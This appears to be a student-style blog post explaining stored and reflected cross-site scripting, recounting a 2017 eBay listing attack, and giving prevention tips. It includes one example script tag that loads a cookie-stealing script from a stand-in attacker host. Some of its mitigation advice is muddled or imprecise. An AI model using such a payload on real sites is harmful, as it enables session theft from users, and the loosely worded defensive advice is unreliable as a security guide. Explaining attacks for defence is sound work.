A Thorough Examination and Explanation of XSS Attacks!

For this blog post I will be discussing XSS attacks what this type of attack is, how attackers execute this attack, a real-world example of people exploiting this vulnerability, and how to successfully prevent an attacker from exploiting this vulnerability on your site. So, what exactly is a cross site scripting (XSS) attack? It is an attack that targets users of a web application rather than manipulating the application itself. A successful cross site scripting attack is to fool users on a web application into unknowingly surrender their private data, along with obtaining a user’s session cookies to be able to impersonate that particular user. There are two XSS attack types the first being stored XSS which is when an attack puts tainted script directly into a web application, which will get anyone who visits the site. The other type of XSS attack is reflected XSS which where tainted script is reflecting on the web application onto the user’s browser; and the tainted script is hidden in a link that will execute once the user clicks on it.

 

 

A more in depth look at XSS attacks with an example of how an attacker would exactly carry out this attack for a stored XSS attack the attacker must study the website to find a weak point to embed HTML tags in a section on the site. Once attacker does this the link that they embed will be stored on the website. An attacker could hide the malicious link in the site such as: Make millions click here <script src=http://nothingfishy.com/steal.js></script>. This will make it possible so that every time that the page loads the hidden script will execute and be able to steal anyone that visits the site’s session cookies. From learning a user’s session cookies an attacker could then gain access to that person’s account. Once the attacker has access to the victim’s account, they could access sensitive information, and impersonate the user. This would all occur from a user just going to a compromised webpage and not having to click on anything that looked suspicious. While an example of a reflected XSS attack is where an attacker would have to embed a malicious link to the website and try to hide the script. Although this method will not automatically execute when you load to the site like the stored XXS attack does. Instead a user would have to click the link to execute the attack for the user’s session cookies to be compromised to the attacker. So, the more damaging attack is the stored XSS attack because it will be able to collect everyone who visits the webpage session cookies allowing the attacker to access many different accounts. As opposed to trying to trick someone to click a suspicious looking link.

 

 

I investigated recent XSS attacks and found that eBay recently suffered from a malicious stored cross site scripting attack. These attacks took place in 2017 where hackers were targeting the popular website eBay from discovering a weak point in the code. The weak point was in auction descriptions were the attackers would place the tainted script. The script in the auction descriptions was placed under fake vehicle listings as well as real low value items. Once someone clicked on a product that they thought was interesting and brought to the product page the page would then reload again. Afterwards it would spit the user out at fake eBay login forum with the URL being data:text/html:base64. To a normal user they would not think anything of this and just think that the site had a glitch, except what was happening was the user was just subject to a stored XSS attack and they were known the wiser. When the user was on the modified page the page would then redirect them to this fake login page where the unsuspecting user would believe it is a real login page for eBay and enter their password and username. Afterwards the user’s information is transmitted to a script and then redirects the user again to an actual eBay page which would then display that the product the user is looking for is no longer available. Even if the user is suspicious about what had just occurred, they have already surrendered their information to the attackers that were exploiting this vulnerability on the eBay website. The attackers on eBay where able to infect thousands of listings and stole many more credentials on the positive side eBay was able to fix these specific attacks back in 2017. eBay also went on to make their site more secure by first limiting JavaScript to blocking it all together in hopes to make their site secure.

 

 

An important question is how to prevent and how to protect yourself from a cross site scripting attack? When making code more secure against XSS attacks it is important to deny all untrusted data into your HTML document and never accept JavaScript code from an untrusted source as we saw from the eBay example. Another important practice when making your site more secure is when you put untrusted data directly into the HTML you should exclude certain characters to help prevent execution of a script. The specific characters to look out for are: “&,<, > , “ , ‘ , /”. Another important rule is to put untrusted data into an attribute value like width or name because data without an attribute value could be broken out of different characters. Another good practice for securing a website is to use a web application firewall to block out any suspicious HTTP traffic on your website. A good method to improving your security on your website is to monitor if there is suspicious data in a HTTP GET parameter value which should then be exited immediately because it may be an XSS attack. An excellent way to protect yourself from an XSS attack is to be a vigilant user and if you are redirected to a login page for no reason do not just submit your information into the text fields. If you are browsing the web do no click on suspicious links that look like click bait as it may be a reflected XSS attack.